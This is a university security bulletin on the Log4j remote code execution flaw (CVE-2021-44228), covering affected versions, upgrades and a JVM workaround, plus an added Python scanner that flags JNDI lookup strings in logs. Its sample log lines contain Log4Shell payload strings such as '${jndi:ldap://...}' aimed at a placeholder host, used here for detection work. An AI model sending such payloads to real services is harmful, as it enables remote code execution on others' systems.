IT Professionals:
The University Information Security Office (UISO) issued a security bulletin about a Critical Remote Code Execution Vulnerability in Log4j [1]. Log4j is widely used in many applications and may be present as an embedded dependency in many commercial or open-source products. Please see the bulletin for details on suggested steps to protect against this critical vulnerability.
Thank you for your partnership in keeping IU secure.
–IT Community Partnerships on behalf of the University Information Security Office
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
The most recent version of this bulletin can be found online at the Information Security website[1].
Title
Critical Remote Code Execution Vulnerability in Log4J
Background
On December 9, 2021, a critical remote code execution vulnerability was publicly disclosed affecting multiple versions of the open-source Apache Log4j logging framework. This vulnerability has been assigned CVE-2021-44228.
Impact
Log4j is widely used in many applications and may be present as an embedded dependency in many commercial or open-source products. These may include commercial applications, locally developed applications, and cloud services. IT Pros can determine whether their systems are affected by examining the log files of any services that use Log4j. Logs that record client-controlled strings such as the user-agent, URL strings, or form field submissions are potentially vulnerable. The presence of 'jndi' strings in log events may indicate attempts at exploitation. Examples include: 'jndi:ldap:/', 'jndi:rmi:/', 'jndi:ldaps:/', or 'jndi:dns:/'. Note, this is not an exhaustive list.
Upon identification of exploitation attempts, immediately initiate incident response procedures and notify the University Information Security Office (UISO) via it-incident@iu.edu.
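The log review described above, as an added example that is not part of the bulletin: a small Python scanner that walks log lines, reports every JNDI lookup string it finds together with the scheme used (ldap, ldaps, rmi, dns), and buckets any other scheme as "other", since the bulletin's list is not exhaustive. Matching is case-insensitive so that casing variations are not missed. The sample log lines and the hostnames in them are constructed for this example; the function and constant names are this example's own.

```python
import re
from collections import Counter

# Lookup schemes named in the bulletin. The list is not exhaustive, so the
# pattern below captures any scheme that follows "jndi:" and the summary
# reports unlisted ones as "other".
KNOWN_SCHEMES = ("ldap", "ldaps", "rmi", "dns")

# Case-insensitive: scanning should not depend on the exact casing a request used.
JNDI_RE = re.compile(r"jndi:([a-z][a-z0-9+.-]*):", re.IGNORECASE)


def find_jndi_hits(lines):
    """Return (line_number, scheme, line) for every log line containing a jndi: lookup."""
    hits = []
    for lineno, line in enumerate(lines, start=1):
        for match in JNDI_RE.finditer(line):
            hits.append((lineno, match.group(1).lower(), line.rstrip("\n")))
    return hits


def summarize(hits):
    """Count hits per scheme, bucketing schemes not in the bulletin's list as 'other'."""
    counts = Counter()
    for _, scheme, _ in hits:
        counts[scheme if scheme in KNOWN_SCHEMES else "other"] += 1
    return dict(counts)


# Constructed sample access-log lines (not real traffic); hostnames are placeholders.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:08:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:08:01:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://lookup.example.invalid/a}"',
    '10.0.0.9 - - [10/Dec/2021:08:01:04 +0000] "GET /?q=${jndi:RMI://lookup.example.invalid/b} HTTP/1.1" 400 0 "-" "curl/7.79"',
    '10.0.0.9 - - [10/Dec/2021:08:01:05 +0000] "POST /login HTTP/1.1" 302 0 "-" "${jndi:dns://lookup.example.invalid/c}"',
    '10.0.0.9 - - [10/Dec/2021:08:01:06 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:iiop://lookup.example.invalid/d}"',
    '10.0.0.7 - - [10/Dec/2021:08:01:07 +0000] "GET /about HTTP/1.1" 200 128 "-" "Mozilla/5.0"',
]


if __name__ == "__main__":
    # To scan a real file: find_jndi_hits(open("access.log", encoding="utf-8", errors="replace"))
    found = find_jndi_hits(SAMPLE_LOG)
    for lineno, scheme, line in found:
        print(f"line {lineno}: scheme={scheme}: {line}")
    print("summary:", summarize(found))
```

A hit in a log only shows that a lookup string reached the service; whether the lookup was actually resolved depends on the Log4j version and configuration in use, so any hit should be treated as a trigger for the incident response steps above rather than as proof of compromise.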
Platforms Affected
The vulnerability impacts Apache Log4j versions 2.0 to 2.14.1; 1.x versions are no longer supported and may also be vulnerable. Any service or application using the log4j framework to write log data to disk may be at risk and should be evaluated.
Local Observations
The UISO has not observed local attempts to exploit this vulnerability. Internet-based attempts are ongoing.
UISO Recommendations
Upgrade to log4j-2.15.0-rc1. For commercial products, install vendor-supplied updates; if no updates are available, contact vendor support.
Workarounds
In earlier releases (versions >2.10), users can set log4j2.formatMsgNoLookups to 'true'. This is done by adding the option '-Dlog4j2.formatMsgNoLookups=True' to the JVM command line used to start the application.
Further Reading
[1] https://informationsecurity.iu.edu/security-bulletins/bulletins-2021-12-10-log4j-remote-code-execution.html
[2] https://www.zdnet.com/article/security-warning-new-zero-day-in-the-log4j-java-library-is-already-being-exploited/
[3] https://www.lunasec.io/docs/blog/log4j-zero-day/
[4] https://www.randori.com/blog/cve-2021-44228/
[5] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228
[6] https://logging.apache.org/log4j/2.x/